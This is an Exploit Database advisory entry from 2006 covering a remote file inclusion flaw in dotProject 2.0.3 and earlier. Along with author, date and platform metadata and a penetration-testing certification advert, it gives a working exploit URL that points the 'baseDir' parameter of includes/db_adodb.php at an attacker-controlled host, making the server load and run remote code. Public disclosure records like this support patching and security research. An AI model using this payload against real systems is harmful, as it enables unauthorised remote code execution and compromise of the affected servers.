dotProject 2.0.3 - 'baseDir' Remote File Inclusion

EDB-ID:

1934

CVE:

N/A


Author:

h4ntu

Type:

webapps


Platform:

PHP

Date:

2006-06-20


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Credits : h4ntu
Title : dotProject <= 2.0.3 Remote File Inclusion
URL : http://www.dotproject.net/
Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 

# milw0rm.com [2006-06-20]